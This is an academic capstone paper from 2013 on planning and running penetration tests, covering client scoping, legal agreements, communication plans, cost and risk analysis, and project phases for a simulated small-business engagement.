effective penetration testing kevin pescatello a capstone ... · effective penetration testing...

Effective Penetration Testing

Kevin Pescatello

A Capstone Presented to the Information Technology College Faculty

of Western Governors University

in Partial Fulfillment of the Requirements for the Degree

Master of Science in Information Security Assurance

22-Jan-2013



Copyright © 2013 Netwerk Guardian LLC

Abstract

This paper will cover the importance of providing penetration-testing services that

comply with laws and corporate governance. Most penetration testing services may or may not

provide the proper structure for execution. Some of these events provide good testing scenario

of what and how to test but fail to provide the supporting documentation, communication, and

legal counsel throughout the process. This project will cover a real life penetration test initiated

from start to finish including the best practices used and required for legally complying with

laws and corporate governance as it should be. The paper will present a case study of a real

penetration test, provide the business dynamics as well as the technical objectives required to

test, and provide countermeasures for an organization. The paper will provide documentation

and artifacts that support the legal and technical requirements in the appendix. The body of the

paper will cover the testing preparation, methodology, and execution. All the information

provided in the report will be changed to protect the identity of the client used in this paper.




Table of Contents

Introduction ................................................................................................................................................... 1

Project scope ............................................................................................................................................. 1

Defense of the Solution ............................................................................................................................. 2

Methodology Justification ........................................................................................................................ 3

Organization of the Capstone Report ........................................................................................................ 3

Systems and Process Audit ........................................................................................................................... 4

Audit Details ............................................................................................................................................. 5

Problem Statement .................................................................................................................................... 6

Problem Causes ......................................................................................................................................... 6

Business Impacts ....................................................................................................................................... 7

Cost Analysis ............................................................................................................................................ 7

Risk Analysis ............................................................................................................................................ 8

Detailed and Functional Requirements ....................................................................................................... 10

Functional (end-user) Requirements ....................................................................................................... 10

Detailed Requirements ............................................................................................................................ 11

Existing Gaps .......................................................................................................................................... 12

Project Design ............................................................................................................................................. 12

Scope ....................................................................................................................................................... 12

Assumptions ............................................................................................................................................ 13

Project Phases ......................................................................................................................................... 13

Timelines ................................................................................................................................................ 16

Dependencies .......................................................................................................................................... 16

Resource Requirements .......................................................................................................................... 16

Risk Factors ............................................................................................................................................ 17

Important Milestones .............................................................................................................................. 17

Deliverables ............................................................................................................................................ 18

Methodology ............................................................................................................................................... 19

Approach Explanation ............................................................................................................................ 20

Approach Defense ................................................................................................................................... 21

Project Development ................................................................................................................................... 22

Hardware ................................................................................................................................................. 22




Software .................................................................................................................................................. 23

Tech Stack ............................................................................................................................................... 23

Architecture Details ................................................................................................................................ 23

Resources Used ....................................................................................................................................... 23

Final Output ............................................................................................................................................ 23

Quality Assurance ....................................................................................................................................... 25

Quality Assurance Approach .................................................................................................................. 25

Solution Testing ...................................................................................................................................... 25

Implementation Plan ................................................................................................................................... 26

Strategy for the Implementation ............................................................................................................. 26

Phases of the Rollout .............................................................................................................................. 26

Details of the Go-Live ............................................................................................................................ 28

Dependencies .......................................................................................................................................... 28

Deliverables ............................................................................................................................................ 28

Training Plan for Users ........................................................................................................................... 29

Risk Assessment ......................................................................................................................................... 29

Quantitative and Qualitative Risks ......................................................................................................... 29

Cost/Benefit Analysis ............................................................................................................................. 30

Risk Mitigation ....................................................................................................................................... 31

Post Implementation Support and Issues .................................................................................................... 32

Post Implementation Support .................................................................................................................. 32

Post Implementation Support Resources ................................................................................................ 33

Maintenance Plan .................................................................................................................................... 34

Conclusion, Outcomes, and Reflection ....................................................................................................... 35

Project Summary ..................................................................................................................................... 35

Deliverables ............................................................................................................................................ 36

Outcomes ................................................................................................................................................ 36

Reflection ................................................................................................................................................ 37

References ................................................................................................................................................... 38

Appendix A: Network Devices ................................................................................................................... 39

Appendix B: Critical Services..................................................................................................................... 40




Appendix C: Penetration Test Plan ............................................................................................................. 41

Appendix C: Penetration Test Action Plan (Con’t) .................................................................................... 42

Appendix D: Audited IT Processes ............................................................................................................. 43

Appendix D: Audited IT Processes (Con’t) ................................................................................................ 44

Appendix E: Qualitative Risk Matrix ......................................................................................................... 44

Appendix F: List of Legal Concerns ........................................................................................................... 44

Appendix G: Sample Contract .................................................................................................................... 45

Appendix G: Sample Contract (Con’t) ....................................................................................................... 46

Appendix H: Sample Contract (Con’t) ....................................................................................................... 47

Appendix I: Data Breach Calculator Report ............................................................................................... 47

Appendix J: Penetration Results and Countermeasures .............................................................................. 48

Executive Summary .................................................................................................................................... 48

Test Objectives............................................................................................................................................ 48

Port Scanning Results and Issues ............................................................................................................ 48

Scanning Windows machines ............................................................................................................. 48

Countermeasures ................................................................................................................................. 49

DoS/DDoS Testing ................................................................................................................................. 49


Application Server Testing ..................................................................................................................... 50


Sniffing and MITM Attacks .................................................................................................................... 52


Appendix AA: MBSA (Microsoft Baseline Security Analyzer) Scan Results ........................................... 54

Appendix AB: Nmap Scan Results ............................................................................................................. 56

Appendix AC: Nessus Scan Results Application Server MAXWELLSM ................................................. 56




Appendix AD: Nessus Scan Results Network ............................................................................................ 60

Appendix AE: Communication Plan........................................................................................................... 60

1

Effective Penetration Testing Page 1


Introduction

This paper outlines the issue of having a penetration test fail and details how an effective

test is to work. What happens when a business requests a pen-test but the company providing the

service does not get the requirements correctly? In addition, the pen-test company that performs

the test does not always perform the test with best practices. The process of soliciting a request

for proposal to identify security posture to planning is where the pen-test company may not

provide accurate results. Often the meeting of the two companies is a short time frame and

requires both sides not just to hear but listen to the requirements and provide a well-documented

response. While the choice to get a pen-test is not difficult the dynamics or preparing and

executing one is quite involved. Many penetration tests do not perform well as they should

because of poor planning or communication and at times both. This paper will outline the costs,

failures, motives, and methods needed to review the security posture at a company.

Project scope

This project will include the entire process of presenting the need for the penetration test,

the acceptance with scope of work, signed written consent, communication plan, action plan, list

of assets and scan type activities, penetration methods, documentation, and a paper report as

attachments concluding the penetration test. This paper will not include any client specific

information relating to the solicitation, presentation, and procurement of contract. The

information provided in this paper demonstrates a theoretical scenario in which Certified Ethical

Hackers have provided a best practices approach in security assessment and penetration testing.

Most companies do not understand the need for a penetration test but will experience

either a breach or denial of service that will affect them. Rather than waiting for the inevitable

the project will provide research of how pervasive the intent of criminal minds permeate the

internet seeking new targets. Once that message has been received and accepted the project will

2



detail the scope of work that will be conducted based on needs and cost. Time has dictated the

direction of this project and so a sample agreement and action plan will be provided to

demonstrate the fundamentals of penetration testing. The communication plan is key to this

project’s success as this is one of the pivotal factors that if not done correctly or at all will

completely remove the effectiveness of testing. The scan type activities are going to be to

enumerate the network and identify systems and when possible known vulnerabilities before

attempting any penetration testing. Automated tools will help assess the situation while leaving

the manual coding for the penetration test. This includes the methodology used in the test that

will be automated and manual once targets are identified.

All the activities herein will create documentation that will serve two purposes. The first

purpose is to gain a better grasp at the inventory one holds onsite and associated risks. The

second purpose will be to prepare the company for a security standard certification and

accreditation. The final report will be the assessed security posture of the company and the

countermeasures it should put in place to secure the infrastructure.

Defense of the Solution

This topic was chosen because the candidate has found that not all security providers

follow best practices for penetration testing and often leave some fundamental part out that

causes poor execution, results, and worse are the disappointed clients. The security industry

requires that professionals provide best in class formulation of strategy when performing tests

that are often not shared. The information security market has not realized its full potential in its

effectiveness to secure corporate and public sector networks. The poor security practices in

which information has been leaked is the cause for the spike in hacking events in 2012. The

paper will go through the details and necessary activities of the perfect penetration test. It is

3



public knowledge that not all penetration-testing companies follow the best practices. It is also

noted that not all penetration-testing companies have the same expertise.

There will also be a survey of penetration testing companies to participate in a review

based on what is going on in the industry. This review will be for the company taking the survey

and for its view of the competitive landscape. Seeking participation in this survey is challenging

because the survey asks for truthful but anonymous response. This information will support the

solution and the reason for this research.

Methodology Justification

The following information explains what the root cause of the problem associated with

penetration testing. This paper will go into detail after the process of soliciting the right

company to perform a penetration test that details the security posture that are to interrupt

business processes or reveal confidential information. There will be an actual penetration test

that will incorporate the best practices explained herein that solves the problem of ineffective

testing. There will be additional documentation attached herein the appendix providing the

scope for the test and the reasons behind it. The causes and impact will address what normally

happens during these engagements and what should happen. The paper will outline the

framework required to test for a specific company detailing the action items that company has to

take for information security assurance. An analysis will begin based on research of recent

reports on data and intellectual theft, costs for testing, and the costs associated for not testing.

Finally, the paper will address a solution that produces relevant results.

Organization of the Capstone Report

The report will go through and explain what needs is to be for a typical company looking

for a penetration test. It will list and discuss the requirements, provide documentation examples

4



of the dynamics for preparing the company for this type of activity as well as the company

preparing their assets for review. The path that the project will take will be one-step of activity

followed by a discussion of best practices and where popular, submit the most common mistakes

or caveats. The paper will detail the actual appointment of testing with a communication plan

and planned tests. Notably, the testing can take different direction based on results found and

require more or less effort depending on what is being tested for. This will be an example of

how dynamic the process is and what can be learned from it. The artifacts created will provide

insight to the business processes the company requires functioning and being profitable. This

will also show where possible vulnerabilities that can be exploited or where devices fail. In the

appendix is where these artifacts will be for reviewing.

Systems and Process Audit

In the following sections, the typical business is to audit the assets that are on site and

pose a risk either by design and implementation. The company who is the subject of the

penetration test will be listing all the devices in preparation for the test. Each asset owner

responsible for the integrity and operation of that device will provide a list of devices and their

function. The company will provide the business justification for the device and why it is in use

today. This business use will be reviewed by the pen testing team to see if the services used

justify the existence of the device on the network based on industry experience. This will be a

form of checks and balance to what management provides as business use in their processes. If

the two match then there is good cause for its existence. If there is a disparity of use then it is

probably time to review its effectiveness. The list of processes associated with the assets will be

in Appendix B. The search here is for a return on investment being associated with a process or

asset. If none exists then why test it.

5



Audit Details

The penetration test team was able to simulate penetration testing of an actual client and

meet with a high-ranking officer to coordinate the evaluation of assets. Typical services that are

provided in a company were also evaluated. This included network devices, services that ran on

the network, applications, and the supporting processes. These supporting processes were not

the type of processes that are normally audited in a security standard accreditation and

certification but ones conducted in order to benefit directly from the device’s purpose. We found

that the company had purchased numerous network devices including switches that support

enterprise class configurations and management and servers in Appendix A. The server on the

network was consisting of one platform that we will be testing as well as unique services

running. The IT department personnel that were interviewed explained their tasks associated

with each device or service recorded in Appendix B. This document shows the critical services

associated with devices in a map and this in a table for ease of reading.

When the interview began, the approach was to determine what technology supported

what business process and how many times technology is used. Beginning from the project bid

being awarded there is human input required to enter in that data into the core business

application called Streetsmarts. This was done by the operations manager and required a

workstation and a LAN (Local Area Network) connection to the server and VoIP (Voice over

Internet Protocol) services. Once the project is in the system and resources assigned to the

project tickets are made for each truck leaving the yard with asphalt. The tickets possess project

and customer information required for accounting and had to be entered into the system. This is

the second time that technology has to be used in order to operate and provide a profit. In

summary of the remaining processes that total number of technology dependent business

6



operations that included network devices was twelve (12). It is true that if the server were down

for a long period there would be no way for the company to keep efficient records and remain

profitable. There would be an increase in person-hours and contingent support processes to

maintain some work flow but it would end the company’s ability to compete successfully.

Problem Statement

The company called upon the pen testing team to ascertain where their security posture

was in relation to their network device footprint. This was the first problem to address because

they were asking a very vague question. What they should have asked was what must be done to

ensure our internal services are not denied availability or the integrity of data to suffer business

impact. The pen testing team introduced the company to a tool that they could use to establish

what devices and services are important to stay running and their severity Appendix D. This is

illustrated in the form of a device and process map, which can be seen as a list in Appendix B.

Problem Causes

The company knew about the recent rise in hacking events around the world and what

was the possibility that it could happen to them. However, their approach was wrong in that they

wanted the pen testing team to test what they had in place and give them a report based on patch

level and weaknesses. They never thought about configurations, operational behavior with

devices, or the users influence. What was discovered was that the network was all built on an

untagged vlan with no other security precautions made to suppress layer two (2) exploits. The

VoIP network ran on the same data network without an encrypted protocol like SRTP. There

was anti-virus software but no intrusion detection or prevention device to alert or mitigate

threats.

7



Business Impacts

When a company looks to a professional service like penetration testing, they are looking

for results that reveal their security posture. These results will give them the direction they need

to move forward. Sophos Naked Security blog reports, “By giving your pentesters a

comprehensive overview of the application and access to architecture diagrams, configuration

and even source code, you can give them a head-start and counter this asymmetry” (McKerchar,

2012). This will help them align security around business processes as most of their processes

run on the network infrastructure. The key here is to take the resultant report and use it for a

road map to a more secure infrastructure. When a company does not invest in this type of

assessment than the integrity of their business processes are at risk. The technology that helps

business compete is also the same technology that can stop them. The business case is what

must be done to determine the effectiveness of the company’s network defenses that ensures the

continuity of the business.

Cost Analysis

The costs required to perform the penetration test and reporting is based on size of

company assets and the depth in which the testing should go. Typically, the costs start around

$2,500.00 and range upward on average to $37,500.00 for most SMB (Small Medium

Businesses). This will cover the testing and reporting but the action required on the company

will be an extra cost. Average cost would equate to $150.00 to $200.00 hourly for skilled pen

tester. Enterprise sized companies can expect to see something in a higher range depending on

size and difficulty of masking the attack.

The client that has agreed to the penetration test for this project and is looking to have the

following tested; web application, network load resiliency, workstation, and domain controller.

8



The cost associated with such test will be reflected in the test plan and a schedule in Appendix

entries C and F respectively. The cost will be $1,600.00 since the test is one type of each device

and two services.

Risk Analysis

The risks associated with this process are that the normal behavior is to fail. Improper

targets, no risk assessments, misinformed clients, no legal counsel sought before the engagement,

and the selection of the wrong pen-testing group, will exhibit failure. We know the risks for an

attack are high because we live in a much-interconnected world. Some startling facts will put

things in perspective to get a penetration test done the right way. An October 2012 report from

Imperva stated that the following attack types are on the rise in discussions on hacker forums;

19% DDoS and 19% for SQL injection. Notably, the article states that security professionals do

not spend time on hacker forums to learn the tools and techniques (Imperva, 2012). Verizon

Data Breach Investigation Report for 2011 highlights some of the most significant threats and

their mode of insertion. It was reported that most data breaches were “98% stemmed from

external agents, and 58% of all data theft was tied to activist groups. In addition, 98% attacks

transpired on servers and were not difficult to execute (Verizon 2012). Therefore, it is

paramount that when considering a penetration test that you know your systems and what to test.

When trying to find statistics that support the success and failure of penetration tests it

will be hard to acquire that data in the duration for this paper. A few inquiries had gone out to

penetration testing companies and the feedback was minimal but this is what it reported. The

following reports from the in-depth research beyond the right way and steps to conduct a

penetration test. A company called Netragard was able to produce a publication that reflects the

objective of this paper. In the publication, Netragard highlights the terminology and the differing

9



perspectives that make the objective penetration testing subjective to the buyer. It is unfortunate

that not all companies are providing the best service in the terms of services advertised alone.

Before that end is reached here is what Netragard had to say about terminology. Penetration

testing is just that breaking through something to test an exploit. “Since Penetration Tests are

tests, they must determine the genuineness of the vulnerabilities that they identify, hence the

word “test”. In most, if not all cases this determination is done through exploitation” (Netragard,

2012). If you are going to test something, than do that. Most times clients buying a service

think that vulnerability scanning and reporting is all that is necessary. This is incorrect.

Penetration tests have a statistical average of success and failure. While these rates may

not be easily discovered a recent survey of professionals has been included in this project.

Averaging around 17% unsuccessful was the self-review most companies estimated making 83%

of what they do is delivered and accepted. The industry peer review was 8% higher in the

unsuccessful rate at 25% average 75% success on assignments. This project has made it

explicitly clear that communication and educating the client what the penetration is intended for

helps curb these ratios to a more successful rate. During the survey, many of these companies

were given a chance to comment on the factors that help or inhibit a penetration test.

The respondents stated the factors that help promote a successful penetration test from

field experience were presented with the following key points. Effectiveness of the test would

exhibit a white box test where network diagrams and user accounts are made available. Also

noted in testing that automation can only take you so far and that creative manual testing will

often provide points of entry. Social engineering while not utilized in this test has been a big

provider of information among the general user population. Survey participants noted that even

season security professionals on site would tip their hand to sensitive information providing a

10



way to plant a rootkit or back door. The following freestanding statements provide interesting

points that support the project’s goal technically and in communication. A respondent stated that

having a good communication plan suggesting an agreement upon limits for testing is a good

practice. Know the effects of the tools before you use them in hopes of observing the expected

result. It was also reported a cooperative staff from the employing client to the pen test team

often yields better results testing exactly what the client needed. Clients that take security

serious and have policies surrounding security provide reports with close to zero exploits.

The other side of effective penetration testing is when a test does not deliver what is

outline in the test plan or even fail to test at all. Survey respondents stated that pen tests are

treated like witch-hunt and that client balks and if anything is found they treat it as their own

failure. Terminology, understanding what the objective of the penetration test is often

miscommunicated, and terms are confused like vulnerability assessment and pen testing. Those

two terms are not the same. Running tools that you are not familiar with yielding results adverse

to the test plan and worse, adverse to the client’s devices. Hardened network infrastructure is not

reason for failure in a penetration test but while nothing may be exploited, the test ran according

to plan.

Detailed and Functional Requirements

Functional (end-user) Requirements

The company in this case is the end user that must provide documents and configurations

to the pen testing team in order to make the best use of time and resources. This gathering of

information must start in the operations manager office with the understanding that we need to

speak with all the asset owners in order to capture the assets and the way that they are used.

Since the client has a small operation, the current office was just fine. Legal counsel must be

11



sought as to represent the client’s best interest and the consequences. Good and bad come can

from penetration tests and the liability has to be addressed and agreed upon by both sides.

Seeking a lawyer with technical background dealing in penetration tests will be the best choice.

The laws passed that mandate compliance for publically traded companies is stricter and further

reaching. The requirements that are to be tested need to match legal requirements. During the

test, there must be communication between the pen test team and the client to ensure that no

permanent damage occurs from testing. The client will have to draw a line as to what is

permissible and what is not. This paper strongly agrees that communication during a penetration

test at a site is paramount in order to stay on plan and provide results without impacting the client

or damaging assets. While the penetration test in this project was simulated in a lab from the

client, the infrastructure was an exact copy. Good communication helps the pen testers as well

as the client requesting the test. A sample communication plan will be inserted for completeness

of the project.

Detailed Requirements

The company will use the sheet provided in the appendix to track assets and processes

associated with each device. Next, they will have to evaluate the severity of each process and

what is the outcome should that service and eventually the device not be available. The pen test

team will take this information under review but also provide their assessment after the test. The

evaluation will be included in the final report. All legal arrangements must be made concurrently

while both sides strive towards a plan and an agreement. This agreement will need to be

reviewed by both sides’ attorneys.

12



Existing Gaps

The current state of penetration testing relies on the penetration testers doing a perfect job

of informing the client of requirements and testing against such requirements. The gap lies in the

information presentation versus the information comprehension. As noted earlier this can be test

types not fully understood. If the industry as a whole could close this gap, it would help the

client in many ways. There needs to be a link to common terms that both sides understand. The

client will also know that the test will only work if the information they provide for objectives is

clear and not vague. The next thing that will change is the way the industry is viewed. There is

a perception that security is an unneeded expense and that the high tech analysis is really a

luxury. Companies will eventually get security services they need to get a snapshot of their

security posture and action items to remedy any variance from the goal. In addition, the project

will identify with security standard certification steps that a company can follow so that the

expense and effort is going to count twice

Project Design

Scope

This project is going to include the presentation of terminology correctly used in this

field, guideline of how a penetration test should be planned, executed, and the dynamics of the

process of doing a penetration test. The project should tell a clear message of how to proceed

with a penetration test for the client and the professional organization providing the service. The

documentation that will be provided will give the reader a better understanding of what it takes

to have an effective penetration test. The statistical analysis, testing, and survey should clarify

the inhibitors and enablers of effective penetration testing. What will the project include and

exclude?

13



Assumptions

The following are assumptions that have been seen or demonstrated in the industry. This

includes contradicting views on terminology, insufficient definition of assets and targets, poor

execution of penetration test, little or no legal counsel and agreements prior to commencing, and

the best talent used incorrectly.

Project Phases

There are various types of phases over the course of a penetration test that needs to be

executed the right way from the start. The phases of this project are going to encompass these

but also include other phases. The phases are as follows; problem statement, preliminary

research for solution, in-depth research, meeting and planning with client with signed written

approval, perform assessment, and provide the report. This can be bulleted as follows,

• Phase 1 – Problem Statement (reason for the research)

• Phase 2 – Preliminary Research (supporting the problem)

• Phase 3 – In-depth Research (survey of pen-testers)

• Phase 4 - Meeting and Planning

• Phase 5 - Assessment (actual penetration test)

• Phase 6 - Reporting

In phase one we have the project and its problem statement and what we are going to

prove. Industry knowledge, recent articles, and education will present the problem and how it

can be fixed by following the right process. When phase two starts, it will be confirmed by

preliminary research from recent reports as to the effectiveness of penetration tests to date. Most

will be industry knowledge and a few supporting reports and publications from penetration

testing companies. The third phase is where the project gets real time information from

14



professionals in the field and incorporates this into the project with survey results. These results

will confirm phase one and two and provide conditions to be advised that can help or inhibit the

penetration test in phases four through six.

Just like a going through a security audit, we must identify the assets that need to be

tested and their owners. This is important because we have to know how they are used every day

and what services are they really going to need testing. This where most companies make

mistakes in giving the keys to the place to the pen testing group stating please test these devices

but for what? The pen test team will want to review with the CIO as to what daily operations are

like and what services are being used over the internal and external facing network. This

interview will help the pen test team ask the right questions and steer the company down the

right road for their testing requirements. In addition, it helps gauge what level of testing and

time will be required and charge the right fee. Shortly after the meeting the company will be

engaged in inventorying their assets that are in production and what services are on their as they

are being used.

The next step is phase four will be where the pen test team takes the information from the

client and builds a test plan. This test plan is going to cover what the client wants to test for and

how they are going to do the test. A good penetration test team will have a communication plan

as when they are executing certain attacks and what the outcome should be. The IT Manager or

Director should be the only person beside the executive officers that knows a test is in progress.

This liaison to the company and the pen test team will alert the lead pen tester if there is anything

adversely happening that inhibits daily operations if that is what is agreed. It may not be agreed

upon to stop an attack and the agreement may be to let things break and test how well the

company IT personnel respond. This will be submitted in person with the legal written contract

15



for the client to review. In the contract is the details about the impact of the test and the fact that

the pen test team will not be prosecuted for conducting illegal activity inside or from outside the

company. The contract needs to be signed by the CEO or CIO of the company for approval in

writing to do a penetration test because of the potential damaging impact it can have on assets.

Both sides’ legal resources must review the legal obligations prior to signing contract. There

may be some tests that the client may not be so accommodating on and will not like it to take

place. The agreement is going to be as comprehensive as the test plan. In fact, the test plan is

what will be signed as the two sides go over every test.

The fifth phase of this project is going to be the actual penetration test itself. When the

company chooses the time, the pen test team will insert themselves in the ether and begin their

assessment. If the pen test team gets the cooperation of the company to do a white box attack

then it will go faster and less cost will be incurred. If the company has chosen to let the pen test

do a black box test then the cost will be substantially higher. This phase of the project is where

the dynamics are in play. The ethical hackers are in the ether and they are scanning and foot

printing the entire architecture to make sure it matches any documentation provided. The

hackers are working according to the test plan and will be executing vulnerability assessments

and then exploiting what they have found. In Appendix C, there will be detail on the test plan as

to what networks and machines are being targeted with what attack and what the result should be

if exploited. The client may very well provide a list of items already scanned and identified as

weak and would like to know what to expect if a service or device is taken down.

The last phase is number six and this will be the reporting portion of the project. What

will be proven here is whether the penetration testing team listened to the client and executed.

The report should contain the test plan objectives with a detailed explanation of how each test

16



resulted. Next, there should be some suggestions in the report that will help the client remediate

any vulnerability exploited from the test.

Timelines

Each step in the process must be completed in relative short and agreed upon time. The

nature of the testing and the urgency of reporting are vital to both the client and the pen test

team. Phase one has already begun and will take about 14 days to complete. Phase two was

kicked off about a week after phase one in order to provide facts in the argument to be proven by

the candidate. After about a week of statistical research phase three was started. Phase three

will be the longest as it is very difficult to get people to participate However, these are real life

statistics that come from the field. The candidate will have to perform a theoretical test based on

a local client to apply this theory about an effective penetration test. The interview and review of

documentation will provide a sampling of data that will be measured against effectiveness of

testing best practices.

Dependencies

Phases four through six cannot be completed until phase three is done. Notably, steps

four through six cannot be completed until a client is secured even if a theoretical test, it will be

based on a real client network. The interview with the client must occur before the scheduled

phase five in order to complete the project. Once the requirements are outlined and understood

the rest of the project will proceed as scheduled.

Resource Requirements

The hardware requirements will be for the test to take place on a network with routers,

switches, and servers. The labor required for this will be at least one and no maximum but two

or three will expedite the testing far more quickly than one. This agreement will require an

17



additional resource as an attorney that reviews the legal document that authorizes and binds the

two parties to operate professionally with the client’s interest as a focal point. The company

providing the service will provide names of the team members that will be coming onsite or

offsite to perform the test. They will have to comply with company policy that the participants

all have to be US citizens and have a clean criminal record or one that has been made right

provided by documented testimony of character and a signature of said individual recommending

them for this service. Pen-test team will be utilizing communication so that the testing remains

on schedule and adheres to the test plan.

Risk Factors

There is a possibility that outside forces can affect the testing. If the day of the

penetration test becomes known to more than just the Operations Manager or President it can

have adverse effects as administrators and asset owners will be hardening their devices or maybe

even shutting them off or acting out of the normal sequence to throw the test. This type of

testing is very imposing and intrusive not just because of the type of test but also because of what

it means. The test is a measure of a company’s applied security practice. People can influence

the test just as if people can influence an experiment by tampering with the subject matter or

communicating what is happening so responses may not be authentic. This will taint the test.

Some conditions can exist that intrude upon the test making it difficult to execute. The

penetration tester can have an off day or fail to push a test as far as they can. Time constraints

and other operational issues may inhibit a test from moving according to plan.

Important Milestones

One of the most significant milestones this project can have is the meeting with the client.

This is by far one of the most rewarding experiences where the penetration testing team can help

18



a client determine their level of security on their infrastructure. Educating the client as to the

terminology and risks facing their company will prepare them for the test and the real world.

Moreover, removing any barriers and resistance to investing in security will be done at this point

demonstrating a return on investment. The second milestone that is the most anticipated is the

actual test. The test will have a scheduled to adhere to but it does not mean that the testers will

not have the option to perform certain exploits outside of the script. You can only speculate

what you will be doing at the planning stage of the test and then the rest will be figured out when

on site. Environmental changes occur that may go unplanned and the team may have to come up

with another entry into the system or possibly even stop an attack if it exceeds the threshold

mutually agreed upon by the client and the testers. The last milestone will be the report. When

all the testing activity has subsided and the network is at a normal state then a report will be

made. Here is where a learning opportunity presents itself to the client. The results will show

where they are weak and a remediation plan will exist to show how they can counter their

vulnerabilities.

Deliverables

The list of deliverables will be a well-designed approach to the project, a meeting and

signing of the contract agreement and test plan, a list of considerations for the legal implications,

action plan (pen tester’s schedule), communication plan, test results and countermeasures report.

Most of what will be provided is working documents and results. The tools required to achieve

this will be using Backtrack5 RC3, Nessus, Armitage, Nmap, and Microsoft Baseline Security

Analyzer (MBSA). The way in which they are used will be in the report.

19



Methodology

The methodology implemented in this project is a theme based on fundamentals of

reading, understanding, and executing. When the penetration testers engage the client, they want

to educate the client and understand the terminology. Once this is accomplished, the dialogue

that takes place will be natural as the exchange of questions and answers helps move the client

along to getting their test objectives correctly set. When the client moves throughout each phase

in this project the penetration testers will manage the client to ensure that after they understand

what needs to be done that they will begin providing the documentation of assets for a speedy

and thorough test. This is another checkpoint of the fundamentals to review who we are, why we

are here, and what exactly is going to be tested. The methodology of planning, doing, checking,

and acting is a common theme among security standards. This is fundamental to validating the

details to make sure assets and supporting processes are really going to have an impact. Pivot

Point Security brings up the fact that a well scoped penetration test requires a lot of effort and

more so for a full security audit (Pivot Point Security, 2012). So the first phase will be addressed

by planning and the communication required achieving the next phase.

The second phase is the research and here we relied on industry knowledge and

awareness along with some sources. This is where we are looking at the problem at a high level.

The issue of being effective exists here and we now have to look at what we are going to do

about it. Additional sources have been provided to show just how stark reality is when nothing is

done about security. Phase one and two are closely related but phase three is where the

methodology changes from traditional research to real time investigative queries. The response

time to the survey that will shed some real time light on the issue is slow going.

20



Phase four really takes on new dimension to the project as research and planning

becomes applied directly in the project. A real life penetration test will begin and the client is

going to benefit from it. The dynamics here of business, technology, and economics are come

into play as client reaches for security and penetration tester extends to deliver a business

solution. The resulting economic exchange benefits both parties, as the payment is an

investment in the longevity of the company. As we progress in the phases, the real time

interaction goes up and the amount of research decreases. In the last phase, the reporting does go

back into a research mode as the penetration team provides reasons for the holes and the best

countermeasure to circumvent them.

The strategy being used here is the fundamental approach to an effective penetration

testing initiative. The other methods cannot produce results because those methods miss the

mark. They miss the targets for educating the client, providing the objectives and test plan

rationale. The uses from going through this process like the legal framework, and documentation

created can be applied to ISO 27001/2 certification and accreditation, FISMA, and HIPAA

compliance.

Approach Explanation

The approach to solving the problem is to carefully identify the problem and understand

why it is not working. The past has shown that the performance of combined 20% failure is not

exemplary. In order to identify what is going on you have to slow down and identify the pieces

that interact to bring the results you are looking for. The way this project is scheduled is to do

just that. Theoretically, one could just run through the activities and try to do a better job than

the first time through the penetration test. That approach is doomed to fail since there is no

change in activity except a more careful second approach at the same environment. The issues

21



are still present and no one has learned the difference or importance of taking the time to identify

underlying issues. Questions are raised if it was process, documentation, communication, or

even the testing skill set. Repeating something repeatedly and expecting different results is akin

to insanity.

Changing the approaches in other phases can significantly change the outcome of the

project. At any phase if no time is given to provide the details of devices and services to test, test

plan and agreement, or the actual assessment can lead to missed targets. The assessment phase

could rely on automation and not get the right results. The assessment phase could concentrate

too much on manual testing and miss the delivery date. The focus can change during the

assessment based on real time results, tunnel vision of testers, and client intervention. Therefore,

it is vitally important that the test plan is followed, and communicated to the penetration test

team in real time. This depends on the size of client and scope of test. Any changes that do

occur have to be evaluated by the lead on the project based on knowledge and experience. If

changes in approach for phase six where the report is delivered there can be some negative

effects. If the delivery of the report is emailed, there is a chance that it is intercepted. If the

report provides little to no remediation tips and countermeasures than the reason for the test is

lost. How the report is generated can also be a factor in its effectiveness. If only automation is

used and reported than, that is failure. If some automation is used and some manual testing is

used but not included in the report than that is failure. There needs to be a time of learning in

order to promote security. Defining how the attack was done is the reason for the hired service.

Approach Defense

It is evident by the preceding paragraphs to ensure that the approach is well thought out

and followed to be effective. This project has outlined the timeline and steps required to be

22



effective. The approach that is represented by this project is very scalable depending on the

availability of resources. In each phase, there is documentation of the meetings, and objectives

to get the security posture defined at the end of the project. Each phase requires that both sides

understanding their objectives and the mutually agreed upon goal. As each phase comes and

goes there is going to be a check and balance as the next phase is not possible until the first phase

is done. This check will be a call or email between the provider and the client as to when to

proceed to the next step. This is especially true for phases four through six. Phases one through

three can be done out of order but the results of each naturally empowers the next phase to begin.

The justification to approaching the project in this manner is to educate client and penetration

tester of best practices in penetration testing.

A post process benefit of this project is that the company, private or public, can stand to

gain a significant advantage in reaching a security certification and accreditation by continuing

their security audit in an elected framework. Each phase from four to six will allow the client to

benefit from the project. Assets and processes associated with the assets are going to be defined

for risk and impact. It would be wise for the company to quantify the assets and associated risk

if something were to happen. This work should be done after the first meeting with an

agreement to pursue. This technical and business assessment does align the technical process

with business objectives, which falls under corporate governance.

Project Development

Hardware

The hardware that is used for the test will be the penetration tester’s laptop and server for

virtualized environment. The hardware used at the test site will be subject to the items listed in

Appendix A for servers and network devices as executed in the test plan as time permits.

23



Software

There will not be any software developed for this testing. There may be some

customized scripts but no developing of software for testing at the client location. The

penetration testing software that will be used is, Backtrack with several software pieces

contained therein. These particular pieces will be mentioned in the test plan and here are a few.

Ettercap, Metasploit, Nessus, and Nmap.

Tech Stack

The layers of service that will be tested against are the OSI model, as well as some

applications again per the test plan in the Appendix C. Most of the testing will be targeting

layers two through four and occasionally layer five.

Architecture Details

The client will provide the following information when architecture is known for a white

box test it will be referenced here but details are in Appendix A. The network consists of a flat

network with one (1) server and ten (10) workstations. The penetration test only used one (1)

workstation and one (1) server. There are VoIP phones but were not tested due to time

constraints.

Resources Used

The resource required to do the test will require just one penetration tester and their

laptop due to the size of client and project timeline. The client’s hardware will be the test subject

and listed in Appendix A. No other resources required.

Final Output

The output of this testing is to provide the client with a security posture assessment so

that future action can be taken to remediate the vulnerabilities. The tangible results will be the

24



report that follows the test plan. This test plan covers the objectives that need to be tested per

client request. The results will include the objective; exploit used, report, and steps to remediate

the vulnerability. The intangible will be the knowledge the client gains from having the test

performed as well as a roadmap to better security. In addition, the client will have the ability to

start the task of being compliant within an industry security certification. This can be either ISO

27001/2 for private companies or FISMA compliance by following NIST SP800-53v3

publication for the public sector.

The initial meeting with the client defined to the client just how susceptible the

equipment and applications are on site. Once the client realized the potential for loss, they were

convinced the penetration service was needed. The subsequent meeting that took place was an

interview that detailed the business process flow from the beginning of profit making activities.

These activities are seen in Appendix B Critical Services and Appendix D Audited Processes.

